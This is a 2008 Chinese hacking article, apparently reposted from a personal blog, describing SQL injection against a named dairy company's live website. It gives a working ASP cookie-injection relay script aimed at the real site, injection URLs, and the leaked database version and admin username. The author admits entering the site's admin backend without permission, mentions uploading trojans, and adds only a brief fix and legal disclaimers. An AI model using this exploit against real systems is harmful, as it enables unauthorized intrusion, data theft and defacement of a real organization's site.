首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
经过中国黑客鉴定,中国乳业网站均存在安全漏洞
来源:http://www.efsys.cn/show/1330_1.html 作者:EF 发布时间:2008-09-22  

三鹿网站被黑.

蒙牛被黑.

全都是SQL注入..

今天早上对蒙牛,伊利网站简单检测了下,均存在漏洞,只是懒的研究....懒的研究..现只说下蒙牛的漏洞所在和修补方法

本帅此文只限和广大网络安全爱好者进行学习交流,我不是黑客,本人也是一菜鸟..本文纯属周末无聊,请大侠们一笑置之,无须理会.

本文仅限学习交流使用,利用该文造成任何破坏或触犯法律的事,均与本人无关!!!

废话少说,看官请看:

进入蒙牛网站,看到一搜索框...告诉大家,这搜索框一般都是好东西..嘿嘿..输入1单引号,如fuck' 提交..

错误:0x80040E14
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]第 1 行: '%' 附近有语法错误。

嘎嘎,没有过滤吧..但我对搜索型注入兴趣不大,而且貌似还过滤了其它东东..懒的研究,现在主要说一个更严重的漏洞.

该程序使用通用防注入过滤了地址栏提交的单引号,如:

http://www.mengniu.com.cn/qywh_mnqywh.asp?IID=11'

是不可以注入的.但程序员在处理时,仅使用了request("iid")来获取数据,这样造成cookies注入的存在.

为了注入方便,简单写了个利用cookies注入的小程序,基本原理如下:

Str="iid="&escape(request("FK"))
Url="http://www.mengniu.com.cn/qywh_mnqywh.asp"
response.write PostData(Url,Str)
 
Function PostData(PostUrl,PostCok)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
 
.Open "GET",PostUrl,False
.SetRequestHeader "Cookie",PostCok
.Send
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function

好了.来试试

http://localhost/f.asp?fk=11&#39;

返回

> 企业文化> 蒙牛企业文化 > 错误:0x80040E14
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。

对了,这样就方便多了嘛..

继续试试?

f.asp?fk=11%20and%201=(select%20@@version)

企业文化> 蒙牛企业文化 > 错误:0x80040E07
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.2050 (Intel X86) Mar 7 2008 21:29:56 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' 转换为数据类型为 int 的列时发生语法错误。

中间省略..

http://localhost/f.asp?fk=11%20and%201=(select%20top%201%20SysU_Usernaem%20from%20sysa_admin)

> 企业文化> 蒙牛企业文化 > 错误:0x80040E07
描述:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'admin' 转换为数据类型为 int 的列时发生语法错误。

剩下的大家都知道怎么做了吧..卡卡~~路过路过..没有技术含量的路过...

权限很低..只能改改数据传传木马,大家请勿乱来,请勿乱来...

补充一下,知道后台么?你人品好,我就告诉你..严禁破坏,否则去坐牢,别拉我...我是无辜的哦...

 

该漏洞修补办法:

请对代码中的request对象进行检查,如果存在

request("iid")等类似用法,请使用clng(request.QueryString("iid"))

对于首页搜索型提交的字符,请使用replace(request.form("newstr"),"'","''")

即可修复此漏洞.

 

郑重声明:此文章仅限学习和交流,利用本文造成一切后果及法律责任请自负!!!!

蒙牛网站公告被插入"EF到此一游"的字样,与本人无关..我有进过后台,但没有修改数据..呃..这人真坏,快赶上当年的本帅了..不过下次的时候写自己名字,免得本帅被人误会..

文章来源:EF的小窝
http://www.efsys.cn/show/1330_1.html


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·提權整理貼
·渗透某知名游戏代理商内网全程
·从CSDN 漏洞谈.NET 安全开发
·教你两句话 动网8.20的后台被拿
·dfcms后台拿webshell,只谈思路
·拿下DVBBS php官网
·通过mysql对淮北生活通网站的一
·hzhost虚拟主机系统致命漏洞
·饶过Xplog70.dll玩入侵
·又一个猥琐的技巧:Surf Jacking
·我在入侵过程中用过的三大门派的
·CSRF with Flash
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved